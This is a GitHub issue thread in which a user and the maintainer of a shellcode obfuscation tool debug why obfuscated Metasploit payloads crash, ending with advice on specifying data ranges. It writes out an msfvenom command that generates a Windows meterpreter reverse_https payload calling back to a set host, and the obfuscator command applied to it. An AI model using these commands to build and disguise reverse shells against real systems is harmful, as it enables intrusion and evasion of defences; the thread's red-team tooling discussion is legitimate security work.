Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Can't generate working shellcode #8

Open
vysecurity opened this issue Jul 8, 2016 · 9 comments
Open

Can't generate working shellcode #8

vysecurity opened this issue Jul 8, 2016 · 9 comments

Comments

@vysecurity
Copy link

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.
@kgretzky
Copy link
Owner

kgretzky commented Jul 8, 2016

Can you send me one of the shellcodes that you are trying to obfuscate?
They may have some hardcoded offsets that make obfuscation impossible.

You can send in binary form and i will disassemble myself.
On 8 Jul 2016 16:05, "Vincent Yiu" [email protected] wrote:

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.


You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
#8, or mute the
thread
https://github.com/notifications/unsubscribe/ASXmJwLCEny0fDoOPcievV3DG_n6vMj5ks5qTlkOgaJpZM4JID_Y
.

@vysecurity
Copy link
Author

Email? :)

@vysecurity
Copy link
Author

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

@vysecurity
Copy link
Author

sc.bin injects fine and calls back. sc2.bin crashes.

@kgretzky
Copy link
Owner

kgretzky commented Jul 8, 2016

Ah sure :)

kuba -at- breakdev.org
On 8 Jul 2016 16:27, "Vincent Yiu" [email protected] wrote:

Email? :)


You are receiving this because you commented.
Reply to this email directly, view it on GitHub
#8 (comment),
or mute the thread
https://github.com/notifications/unsubscribe/ASXmJ0MXVoxcsVBCR92LdHM6J3Ya7fudks5qTl49gaJpZM4JID_Y
.

@kgretzky
Copy link
Owner

kgretzky commented Jul 8, 2016

Can you send me the sc.bin file? I don't have the metasploit environment around me currently.
I will take a look at it and let you know what's up.

@vysecurity
Copy link
Author

Sent Email.

@kgretzky
Copy link
Owner

Thanks, got it!
I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode is not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png
I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation for this specific sc.bin file, the argument for specifiying code ranges would look like this:
-r0-184,329-465,481-490

For now I'd advise to use the reverse_tcp payload as it doesn't have any static data blocks. I will be working on Metasploit generator tool using Obfusion library that will simplify the process of generating obfuscated shellcodes.

@vysecurity
Copy link
Author

Thanks. I think I get it. I'll go into some more work with this :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@vysecurity @kgretzky